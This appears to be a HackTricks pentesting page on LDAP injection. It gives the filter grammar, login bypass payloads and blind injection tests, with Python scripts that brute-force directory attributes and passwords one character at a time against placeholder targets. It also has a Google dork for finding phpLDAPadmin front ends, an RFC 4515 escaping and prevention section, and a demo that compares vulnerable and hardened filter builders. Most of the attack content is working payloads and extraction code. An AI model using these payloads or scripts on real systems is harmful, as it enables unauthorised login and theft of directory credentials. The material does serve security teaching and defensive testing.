hacktricks/pentesting-web/ldap-injection.md
2024-02-11 02:13:58 +00:00


LDAP Injection


LDAP

If you want to know what LDAP is, visit the following page:

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %} pentesting-ldap.md {% endcontent-ref %}

LDAP Injection is an attack against web applications that build LDAP search filters (or DNs) by concatenating user input. It occurs when the application does not escape or validate that input, so an attacker can change the structure of the filter the application sends to the directory, which can lead to authentication bypass, unauthorized reads of directory data, or manipulation of which entries a later operation acts on.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE

For example:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))

A successful injection gives you read access to the directory, which can hold many kinds of information (users, groups, e-mail addresses, hosts, and sometimes clear-text credentials).

OpenLDAP: If 2 filters arrive, it only executes the first one and ignores the rest.
ADAM or Microsoft LDS: With 2 filters, it throws an error.
SunOne Directory Server 5.0: Executes both filters.

It is very important to send the filter with correct syntax or an error will be thrown. Whenever you can, craft the payload so that the server receives only one well-formed filter.

The application's filter must start with: & or | (the injected value closes the items of that AND/OR list and either terminates the filter or appends items of its own)
Example: (&(directory=val1)(folder=public))

(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void

Then: (&(objectClass=*)(ObjectClass=*)) will be the first filter (the one that gets executed); the remainder, (&(objectClass=void)(type=Epson*)), is a second filter that OpenLDAP ignores.

Login Bypass

LDAP supports several password storage formats (in OpenLDAP: {CLEARTEXT}, {MD5}, {SMD5}, {SHA}, {SSHA}, {CRYPT}). So, it is likely that whatever you put in the password field is compared against a stored hash, and a wildcard such as password=M* will not match a hashed value. The payloads below therefore do not try to guess the password: they use the user field to close the filter, neutralize the password item with an absolute TRUE (&) or a NUL byte, or wrap it in an OR that is already satisfied.

user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed after the NUL byte
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) # Second filter: works on OpenLDAP, can throw an error elsewhere
username = admin)(!(&(|
pass = any))
--> (&(uid=admin)(!(&(|)(webpassword=any)))) --> As (|) is FALSE, the inner (&(|)...) is FALSE and the (!...) is TRUE, so the user is admin and the password check passes.
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
username=admin))(|(|
password=any
--> (&(uid=admin))(|(|)(webpassword=any)) # Second filter again: only the first one is executed


Blind LDAP Injection

You can force a FALSE or a TRUE response to check whether any data is returned and confirm a possible Blind LDAP Injection:

#This will result in TRUE, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
#This will result in FALSE, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))

Get data

You can iterate over the ASCII letters, digits and symbols, keeping a character whenever the response is the TRUE one (this requires the attribute to be stored in clear text and to support substring matching):

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...

Scripts

Discover valid LDAP fields

LDAP objects contain by default several attributes that could be used to store information. You can try to brute-force all of them to extract that information. You can find a list of default LDAP attributes here.

#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = {"http": "localhost:8080"}
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes:  # Extract every attribute in the list
    value = ""
    finish = False
    while not finish:
        for char in alphabet:  # At each position test every possible printable char
            query = f"*)({attribute}={value}{char}*"  # Closes (login=...) and adds (attribute=prefix*) to the AND
            data = {'login': query, 'password': 'bla'}
            r = requests.post(url, data=data, proxies=proxy)
            sys.stdout.write(f"\r{attribute}: {value}{char}")
            #sleep(0.5)  # Avoid brute-force bans
            if "Cannot login" in r.text:  # On this target "Cannot login" means the filter matched an entry: the char is correct
                value += str(char)
                break

            if char == alphabet[-1]:  # Last char tried without a match: no more chars in the value
                finish = True
    print()

Special Blind LDAP Injection (without "*")


Description

Blind LDAP injection is the variant in which the application never shows the entries that matched, only a boolean side effect: a "login OK" versus "Cannot login" message, a populated versus empty result page, or a syntax error versus no error. Each request then answers one yes/no question about the directory, and the attacker extracts data by asking many of them.

The "without *" case covers applications that strip or reject the wildcard in the injected value, or whose own query template already terminates the injected value with "*)" (the script below assumes the latter). The attacker then sends only the candidate prefix, for example admin*)(password=MB, and the application's own trailing wildcard turns the injected item into (password=MB*), so the same prefix-by-prefix search works without injecting a wildcard at the end.

Exploitation

Find an input that reaches the filter (login form, search box, directory browser). Inject a value that forces a TRUE filter, such as *)(objectClass=*))(&objectClass=void, and one that forces a FALSE filter, such as void)(objectClass=void))(&objectClass=void, and confirm that the two responses differ; that difference is the oracle. Then, as in the Get data section, pin the target entry with an equality item such as (uid=admin) and grow the wanted attribute one character at a time, keeping a character whenever the response is the TRUE one and moving on to the next position.

This works for any attribute that supports substring matching: uid, cn, mail, description and so on. It does not recover a userPassword stored as a hash: the server compares against the stored hash string, and in OpenLDAP's core schema userPassword has no substring matching rule at all, so (userPassword=M*) is an Undefined filter and evaluates as false. Clear-text "password"-style attributes, as in the examples on this page, are the ones worth brute-forcing.

Prevention

The fix is to stop user input from changing the structure of the filter, not to hide the oracle:

  1. Escaping: escape every user-supplied assertion value according to RFC 4515 before concatenating it into the filter: * becomes \2a, ( becomes \28, ) becomes \29, \ becomes \5c and NUL becomes \00. Use the library function rather than a hand-written one, e.g. ldap.filter.escape_filter_chars in python-ldap or ldap3.utils.conv.escape_filter_chars in ldap3. Values that end up in a DN (a bind DN built from the username) need the different RFC 4514 escaping.

  2. Input validation: validate against an allow-list on top of escaping. A username has no business containing *, (, ), \ or NUL, and a search term that legitimately needs a wildcard should get a single trailing * appended by the application itself. LDAP filters have no parameter binding comparable to SQL prepared statements, so escaping plus validation is the equivalent control.

  3. Least privilege principle: the service account the application binds with should only be able to read the attributes and subtree it needs, so that an injected filter cannot enumerate userPassword or unrelated branches of the directory.

  4. Error handling: return the same generic message for "user not found" and "wrong password" and never echo the LDAP error to the client. This narrows the oracle but does not remove it, since any consistent difference in content or timing is enough for blind extraction; only escaping and validation remove the injection.
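To make the mechanics above concrete (the filter-splitting behaviour, the login bypass payloads, the character-by-character extraction of the Get data section, and the effect of RFC 4515 escaping), the following Python script is an added example written for this page, not code from the original page or from any LDAP product. It implements a small RFC 4515 filter parser and evaluator over a constructed in-memory directory, mimics the OpenLDAP behaviour of ignoring everything after the first complete filter, and runs the attacks against a vulnerable filter builder and a hardened one. The entries and their attribute values, the vulnerable_filter/hardened_filter templates, the login_matches oracle and the blind_extract payload shape are all assumptions made for the demo.

```python
import re
import string

# Constructed toy directory for the demo (not real data). Matching is
# case-sensitive here; the caseIgnore rules of real attributes are not modelled.
DIRECTORY = [
    {"uid": "admin", "mail": "admin@corp.test", "password": "MB7q"},
    {"uid": "alice", "mail": "alice@corp.test", "password": "hunter2"},
]

ALPHABET = string.ascii_letters + string.digits + "@._-"


def parse_filter(s, i=0):
    """Parse one RFC 4515 filter starting at s[i]; return (node, index after it).
    Only the first complete filter is consumed and trailing text is ignored, the
    OpenLDAP behaviour described on this page (ADAM/LDS would raise an error)."""
    if s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if s[i] in "&|":                      # and/or over zero or more sub-filters
        op, i, children = s[i], i + 1, []
        while s[i] == "(":                # (&) and (|) simply have no children
            child, i = parse_filter(s, i)
            children.append(child)
        if s[i] != ")":
            raise ValueError(f"expected ')' at offset {i}")
        return (op, children), i + 1
    if s[i] == "!":
        child, i = parse_filter(s, i + 1)
        if s[i] != ")":
            raise ValueError(f"expected ')' at offset {i}")
        return ("!", child), i + 1
    eq = s.index("=", i)                  # simple item: attr=assertionvalue
    close = s.index(")", eq)
    return ("=", s[i:eq].strip().lower(), s[eq + 1:close]), close + 1


def value_regex(value):
    """Assertion value -> regex: '*' is a wildcard, '\\xx' a hex-escaped literal."""
    out, i = "", 0
    while i < len(value):
        if value[i] == "\\":
            out += re.escape(chr(int(value[i + 1:i + 3], 16)))
            i += 3
        elif value[i] == "*":
            out += ".*"
            i += 1
        else:
            out += re.escape(value[i])
            i += 1
    return out


def evaluate(node, entry):
    """Evaluate a parsed filter against one directory entry."""
    kind = node[0]
    if kind == "&":
        return all(evaluate(c, entry) for c in node[1])   # (&) is absolute TRUE
    if kind == "|":
        return any(evaluate(c, entry) for c in node[1])   # (|) is absolute FALSE
    if kind == "!":
        return not evaluate(node[1], entry)
    _, attr, value = node
    stored = entry.get(attr)
    return stored is not None and re.fullmatch(value_regex(value), stored) is not None


def search(filter_string):
    node, _ = parse_filter(filter_string)
    return [e for e in DIRECTORY if evaluate(node, e)]


def vulnerable_filter(user, password):
    """String concatenation, the pattern this page attacks (assumed template)."""
    return f"(&(uid={user})(password={password}))"


def escape_filter_value(value):
    """RFC 4515 escaping of the characters that can change filter structure."""
    return "".join(f"\\{ord(c):02x}" if c in "*()\\\x00" else c for c in value)


def hardened_filter(user, password):
    return f"(&(uid={escape_filter_value(user)})(password={escape_filter_value(password)}))"


def login_matches(build, user, password):
    """The boolean oracle a blind attacker sees: did the login filter match anything?"""
    try:
        return bool(search(build(user, password)))
    except (ValueError, IndexError):      # malformed filter -> server error -> no match
        return False


def blind_extract(build, user, attribute, alphabet=ALPHABET, max_len=64):
    """Recover `attribute` of entry `user` one character at a time (Get data section).
    The payload pins the uid, adds (attribute=prefix*), closes the AND and opens a
    second filter that swallows the application's password item and is never run."""
    value = ""
    while len(value) < max_len:
        for ch in alphabet:
            payload = f"{user})({attribute}={value}{ch}*))(&(uid=void"
            if login_matches(build, payload, "bla"):
                value += ch
                break
        else:                              # no character extends the prefix: done
            return value
    return value


if __name__ == "__main__":
    print(login_matches(vulnerable_filter, "*)(&", "*)(&"))        # True: login bypass
    print(login_matches(hardened_filter, "*)(&", "*)(&"))          # False: escaped
    print(blind_extract(vulnerable_filter, "admin", "password"))   # MB7q
    print(blind_extract(hardened_filter, "admin", "password"))     # empty string
```

Against a real target, login_matches becomes an HTTP request and the "did it match" check becomes whatever difference in response you identified in the Blind LDAP Injection section. Against ADAM or Microsoft LDS, where a second filter is a syntax error, use a payload shape from the Login Bypass list that keeps a single filter, for example *)(mail=a*)(|(password=* which yields (&(uid=*)(mail=a*)(|(password=*)(password=bla))).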

#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        # No "*" is injected after the candidate: the application's own template is assumed to close the value with "*)"
        r = requests.get("http://ctf.web/?action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):  # replace with the response that marks a match on the target
            flag += char
            print("[+] Flag: " + flag)
            break

Google Dorks

Google Dorks are search-engine queries that surface indexed administrative interfaces and leaked files. For LDAP injection the interesting hits are web front ends to directories, such as phpLDAPadmin instances, whose login and search forms are natural places to try the payloads on this page, on targets you are authorised to test.

intitle:"phpLDAPadmin" inurl:cmd.php

More Payloads

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}

